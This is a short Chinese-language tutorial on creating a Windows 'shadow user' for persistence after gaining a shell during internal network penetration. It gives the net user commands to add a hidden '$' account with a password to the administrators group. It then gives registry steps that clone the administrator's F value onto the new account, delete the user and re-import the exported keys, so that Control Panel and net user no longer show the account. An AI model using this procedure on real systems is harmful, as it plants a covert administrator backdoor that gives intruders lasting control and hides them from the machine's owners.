文章目录
- 1.认识影子用户
- 2.创建隐藏账户并加入管理员组
- 3.修改注册表
- 3.删除用户
- 4.添加管理员权限
1.认识影子用户
影子用户通常指的是那些在系统用户列表中不可见,但在某些情况下可以进行操作的用户。
在内网渗透过程中,当我们拿到shell时,肯定要进行权限维持,影子用户就是在用户不知情的状态下,创建一个具有管理员权限的用户
2.创建隐藏账户并加入管理员组
net user hacker$ 123qaz@WSX /add
net localgroup administrators hacker$ /add 将hacker用户添加到管理员组
3.修改注册表
win+r:regedit------->打开注册表
修改权限
找到对应的类型
administrator:1F4
hacker$:3e9
复制1F4中F的值,粘贴到3E9的F中
将00003e9导出为1.reg,hacker$导出为2.reg
3.删除用户
net user hacker$ /del
按顺序点击1.reg和2.reg文件,重新导入
4.添加管理员权限
至此:控制面板看不到。net user看不到。 本地用户组看不到,但是注册表还是可以看到的
